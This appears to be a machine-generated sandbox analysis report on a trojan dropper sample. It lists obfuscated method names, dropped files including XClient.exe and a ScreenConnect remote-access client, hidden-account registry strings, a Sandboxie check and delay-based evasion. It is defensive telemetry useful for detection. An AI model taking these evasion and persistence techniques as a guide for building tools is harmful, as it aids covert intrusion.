Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, tLU2VSaMPJVr9yYF210.cs	High entropy of concatenated method names: '_8Dv9Vs0yYdsXpix8YZ5', '_33mfWWmtXmIFlbwYjbP', 'fyV6ElXjQFVoD7Yg3kF', '_0BDIFbEntewBARUJ4AW', 'fqIvHQf6rAwJUitJOP8', '_95cb8wIZ0IiuEdW06pv', 'vofk0Ebiv5msx02tB68', 'ANjcVj4YuJXZH1VS6tu', 'i7usY4bVPNyXwaMZ5Ju', 's0jWpDKqEC1xDlifl9S'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, 5XWegNUSYQmoH9YsXWwL3Z5IjscWBkw0lURjMwsQ9tAyS4PHWjw.cs	High entropy of concatenated method names: 'LWDWjlJsqySwJDhxKwnA1ob1nnOruYHv9gzUB79qBivHrjTnney', 'Y0VjIJJmphFLtNgnVRlJtkb6Zvac4d8CsGISBXZvh4UUkyJFWZK', 'rC50bPsbhHc', 'ZCzCuMnDJHI', 'dNNMngHzGun', 'KkeGQAswrfy'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, 9mKnnIJtPQLqnwuwN1X.cs	High entropy of concatenated method names: 'eWyI97yyAY8tIl80q4N', '_1dQrlFoEc0nmRImvsgz', '_0cHWb2aV6xgzjJsjWcI', 'Q5p8BUNetdTWjQBMuQe', 'xZLnEQZRC0RP8JfNkXV', 'EV5O9Od9dWdTAgnAIFf', 'Hcv1gbLjQkP5jymonLm', '_46t0mKTweJXPdiP4vnI', 'DmQzLGXanTZDm5YW6W5t3kBYYhBr81G4QE92ZruwFYaHVASOM5T', '_81I9aQAGvNUhA6REsbvamffB0q2JhjBD4Poo3E4Kv3xJdmaKzK1'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, xlOlMInMQpmeBLv2Td7q6lNkfsP2MFkqfuNevjXRwqob1nCSpZW.cs	High entropy of concatenated method names: 'zHqvhuLG3DMOxlZdsTXjrI8UgLF7nmFNxZLihWZnWCXahOtHf0U', 'iMWGDPZByTOs606Zhm1RtdYkO4BkCLldZDD1INwoNnlFpui3dVU', 'xGnaDo0bmxRAlqiv1AKIb2U13PWHwEAKXVU0alG8Kn47vh5P8gY', 'hWr0UVh8hAMIAlHTTh7zBHwmMBHpI9Xn2Bnxy5dG80yQoq2l4ic', 'YAZvi16fJEn', '_3f2Tt8ab2V3', 'vyuWNSKG9jS', 'rQMkjoOKIcj', 'hdA0o0L81xT', '_9nXD0KODXut'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, ipQBGHtOli8FsdvUrICHUQGCaKXp4kZTzUvcHh0kSfN96VRQKcE.cs	High entropy of concatenated method names: 'pat8Jmb6Y3fVcrPtL1Z4Geu2isETsDV2vCvSXt7Mg6i29bkYoh5', '_9LqgpCT0wm8b8wMEwuxQSLp7cNVNA2rkOYUEtOQu4YBBcNSdPME', 'WIl9K3WqOPWOcIYEfxMtSAh1HbUmrzbaLurxMvynPc32WtcmiTj', 'a5kzdzg3HLQ', 'Ht3WasYKPuj', 'pnyv45Hy8LS', 'eUKfGQ0ryft', '_2ZyucE7JLEh', '_6DsE6k9MkQE', 'CLgQaZa1q5v'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, aOY1LHkSxcz7bCNxQCW.cs	High entropy of concatenated method names: 'WxXahuCOFEVUX8YwHBXgUzre8PPvZOccVGWnV', 'udJnGVG5BX8a0x17De5vjBisXASL4It0rpgad', 'f4P382k0bLtGwSaO4LWwtjLcqFEJweaLp8QR7', '_533lYKmbIIoU0cbbDLfDd8kxGQT2GmNBJwCjD'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, ZCpsIWfDS7AkpK9SKjuwhH4KkL4LSGD6th7sJ2hAa0ZVEq51hCmhMVSafkw7M38e5XZLdMicldIn7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZYOKKT5w3GBHY4kJne8wizAtzWeXZgDGGuLUC', '_9dlIsfrCf1uOpOVJYiWUu49AQOhS4OiQ16y4W', 'PvbdRdJbGx4288CxPeLwEkTqpsm7pB2BGNFZq', 'aaZGIVo6wJtASEnwPZ9Sy1qATExnWIlI0tA1j'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	High entropy of concatenated method names: 'HmKj8f2UpIC4WXD6cga', 'ekkHJ3mmuD9PGoANEu1', 'idLGquPdixZnDbopEyB', 'mTRqbYcTSOZyBbB5FeH', 'YyGs8eE9dPBhF3MiPv9', 'bmgAcruG4jlqHQTwrvy', 'wpTgTsMVrYjXW16ueio', 'ndiNw4k0g7M1AMgqMhk', 'UPo6MGr04FyiFQxxqTz', 'aBOp4u9COf4kMyc6NNq'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, R6ucxiO1Ll9Uiqd2r7r.cs	High entropy of concatenated method names: '_2DLzGtrM3rdImQqlpGK', 'R53XZECzmMWs6gnGM3H', 'JNTme6KWPk1e3Hl5ynq', 'k5EjjSL9ZIpNjValRcPI73Fx3HbJWJxdYSNjMpg6XT7c8TqhEU6FJM9qgqrxtFJkj2Y7V', 'XuxW4ZTdl5WlSDTTMKnxDhSVuPoCC8rroUUhOohbm8nWBXeV6sGnksKuARPDdV2x9zAq2', 'qXSc4n77SNw94UtawAlPPdHxkPJpxdy14TQRZ7CiJ1QMVU2YmQM703BdtZrKSFk7lPy5f', 'XjYcSsOuP4PnE1LxjSQ80zukitMlsHPeoR0Ua0K0dwXMYSr7JptKNEApoJhkmk4zM9n3m', 'yKwussRCHNLBnDyfF2elQQ99RkoBIFN9mU5BoD7UMdAUQ3Vwqr6TCRP5bHPwzdgyRk9yU', 'AtWYBfFnnwqCRxvYCTGWRtwHT2zQy3E1TATaP1R1IqvgKt44cx8fQLupK0iVG7lySsoy0', 'XxCPjcMW4umdDOse8GoyFMrGJn1MpBAEePzdcnMp9t8US7KMhFK63tUwml7flJepB3sX4'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, bBpHSt10PQXanEg3s65.cs	High entropy of concatenated method names: 'njbTfylSdh3DVkASU8B', 'wRFqwzdmUb398NB0tjqKIKNj3HO0IRF4iM5ueNx4DY2RemWHOJLVvukBwaV7YCprtAJzT', '_9HUcVNIFqE5V4cBpmXXwSZJOXL1J4NkPrXWnqLt2jShO2LxV93cnJK1c3UMCWuEUp088A', 'iVajpGwq8QPObtQWs2QCLAm774ZD5AiXepguxghvobo5ckcWCzHt3njKFDd5C2H1MvLP8', 'zPns4ysKQVFejKfpplQBYHFBQDHmuYYH1V8YnTlEWuPtnaT19ycSING03dCltijQTOyHG'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	High entropy of concatenated method names: 'lMhAN6ieJ9Gj270e3d8l6EuzAUMBNqU7e0PkHcPWsXpFDOT4aDU', 'pITcJHMfLgAJyx2Plpdek5MwZq8QVL1NSfSte1xuToKigzfYhcM', 'X1N6QbUIdblD5ej3yrD1RpCoqH3zqdiwRAenKuHF2kj5bOgN27i', 'jQQEALPZoWpqfBYUXcnOJYScRP9IKN6eaMSmYGZcGsuIJwFxqBz', 'SF1GVCK8i8RGOjTFnFTwxYgNFLa4bV4oZBDmuyRSJlNPAXhbCZf', 'WsJcizhaoEcEAhJ4UE3sbrrsyBWJUV9y6ZYWGIf3N1eRJ9ENYmy', 'OfJY8JSodSrSeYJVXlHsLlQEvNdYYECBtYFnHnaB2zBsSsgpRxo', 'U5WHrHeluK7MpFqfL1PH9OkYhID0nZvE5eZY900wzHRUCc8kDrQ', 'dLy8Y9KJmGOzLl60X5AyBd0RXwBeExMJjcoGfhAc8mbTMzjaMX4', 'Kb3IrrhexuigkuRmIfSWyqQNvWLa6DxOfV0kOrcSu8XB8BytlEB'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, dsUdPXhp5sK8qnlF2Z8.cs	High entropy of concatenated method names: 'hu9IREyIUh7b9tqrTwH', 'q5tdLTJOCx538rWyVxP', 'GAyvJAV3BqIFycyTBhK', 'LII6FqpHgazlxktlAO3', 'JcWQpZU9DeZrpN3z0XO', 'AvF7gTZZ984KiKpgVQE', 'clk2pToYFRt1nb6AAUj', '_6fjYweCLJHPkRTYeZuV', 'P9pDEcOMz199mTqUmf7', 'w6AGO8ujJxryr9R3Yl8'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, tLU2VSaMPJVr9yYF210.cs	High entropy of concatenated method names: '_8Dv9Vs0yYdsXpix8YZ5', '_33mfWWmtXmIFlbwYjbP', 'fyV6ElXjQFVoD7Yg3kF', '_0BDIFbEntewBARUJ4AW', 'fqIvHQf6rAwJUitJOP8', '_95cb8wIZ0IiuEdW06pv', 'vofk0Ebiv5msx02tB68', 'ANjcVj4YuJXZH1VS6tu', 'i7usY4bVPNyXwaMZ5Ju', 's0jWpDKqEC1xDlifl9S'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, 5XWegNUSYQmoH9YsXWwL3Z5IjscWBkw0lURjMwsQ9tAyS4PHWjw.cs	High entropy of concatenated method names: 'LWDWjlJsqySwJDhxKwnA1ob1nnOruYHv9gzUB79qBivHrjTnney', 'Y0VjIJJmphFLtNgnVRlJtkb6Zvac4d8CsGISBXZvh4UUkyJFWZK', 'rC50bPsbhHc', 'ZCzCuMnDJHI', 'dNNMngHzGun', 'KkeGQAswrfy'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, 9mKnnIJtPQLqnwuwN1X.cs	High entropy of concatenated method names: 'eWyI97yyAY8tIl80q4N', '_1dQrlFoEc0nmRImvsgz', '_0cHWb2aV6xgzjJsjWcI', 'Q5p8BUNetdTWjQBMuQe', 'xZLnEQZRC0RP8JfNkXV', 'EV5O9Od9dWdTAgnAIFf', 'Hcv1gbLjQkP5jymonLm', '_46t0mKTweJXPdiP4vnI', 'DmQzLGXanTZDm5YW6W5t3kBYYhBr81G4QE92ZruwFYaHVASOM5T', '_81I9aQAGvNUhA6REsbvamffB0q2JhjBD4Poo3E4Kv3xJdmaKzK1'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, xlOlMInMQpmeBLv2Td7q6lNkfsP2MFkqfuNevjXRwqob1nCSpZW.cs	High entropy of concatenated method names: 'zHqvhuLG3DMOxlZdsTXjrI8UgLF7nmFNxZLihWZnWCXahOtHf0U', 'iMWGDPZByTOs606Zhm1RtdYkO4BkCLldZDD1INwoNnlFpui3dVU', 'xGnaDo0bmxRAlqiv1AKIb2U13PWHwEAKXVU0alG8Kn47vh5P8gY', 'hWr0UVh8hAMIAlHTTh7zBHwmMBHpI9Xn2Bnxy5dG80yQoq2l4ic', 'YAZvi16fJEn', '_3f2Tt8ab2V3', 'vyuWNSKG9jS', 'rQMkjoOKIcj', 'hdA0o0L81xT', '_9nXD0KODXut'

Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI475F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI49E0.tmp	Jump to dropped file

Source: rundll32.exe, 00000006.00000003.1251273476.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345183979.000000001B092000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1340770610.0000000000D80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.6.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll.4.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.4.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Source: XClient.exe, 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, XClient.exe.0.dr	Binary or memory string: SBIEDLL.DLLK8NG5FNK7RJG9WWQDMGLI7XIQYRKTTTLX4APUIKJKSN20XMWIR6DJ1U9FBXGWSQMMF72VYAWRF88KKSJTUVU20Z25ADQR5LSYOWZCEA2ECH6DAOA9CK3KYR23RNBYTHVMXXJKNRMI3FIFFP4GDJ5PZNEKIPD0HGHIFEGWW8CVTMZ6YI98S0QAFB6SMAKOGKJBAZS5A2JIPP1OUDAJMEVESTMYHEINQQFFUQOKDOZ160GCVQF3VTW3MQG2H23GLRUVCP15ODAERK7HDL7LIMVISHVPFVHD6U54CNAM5VHPRLE4U2QK1JYAAZE5BXQMCM9GJUT4DXTNZCWETRTWZBPRKKJB14TCKVCFDN6WLESCLWTNTQKJMC9XU4MU5WWKNXW7CZB9NFUD2OUHB3KWENP0NF4DANDXWXT4HKCWJINVXGJLGHZNQFTGGKBBJOGXHAHWHECCT9RKCV4ZHMRYKHVAFVKUJUR5VZKUWZUIIROUSC1LBKAFJUGLWH7JTOBVJH7CWCP7V8607YQK6HR1FMIKKR2A8CNEL5L7ABP4PQDC4UFL6EIQ6JN5LI5EKKLZR6YSKOTWD3UNO5531IE8BNRRWHB019FBDKFINFO

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Memory allocated: 3750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Memory allocated: 1B810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 11A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1AC80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Memory allocated: 1180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Memory allocated: 1950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Memory allocated: 1520000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Memory allocated: 1B170000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Memory allocated: D20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Memory allocated: 1A760000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI475F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI49E0.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe TID: 6568	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe TID: 7264	Thread sleep count: 100 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe TID: 7580	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed